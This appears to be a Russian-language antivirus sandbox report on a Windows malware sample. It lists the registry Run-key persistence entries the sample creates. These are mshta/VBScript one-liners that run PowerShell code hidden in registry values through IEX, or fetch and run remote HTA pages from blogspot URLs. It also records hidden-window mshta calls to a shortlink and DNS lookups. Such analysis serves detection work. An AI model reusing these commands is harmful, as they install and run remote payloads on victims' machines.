Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Defeduckgotfucked' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)|IEX"", 0 ...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'mithuiki' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)|IEX"", 0 : window.clo...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'checkmatebaby' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://dodumdum6.blogspot.com/p/299.html"", 0 : wi...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""https://milltu99.blogspot.com/p/299.html"", 0 : window.close")'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'bukun' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://potatokapoli.blogspot.com/p/299.html"", 0 : window....
- '<SYSTEM32>\mshta.exe' http://%8###%8234@j.mp/ddksqwuoqejasnw
- '<SYSTEM32>\ping.exe'
- 're#####es.blogblog.com':443
- http://j.#p/ddksqwuoqejasnw
- DNS ASK j.#p
- DNS ASK mo#####dk.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\mshta.exe' http://%8###%8234@j.mp/ddksqwuoqejasnw' (со скрытым окном)
- '<SYSTEM32>\ping.exe' ' (со скрытым окном)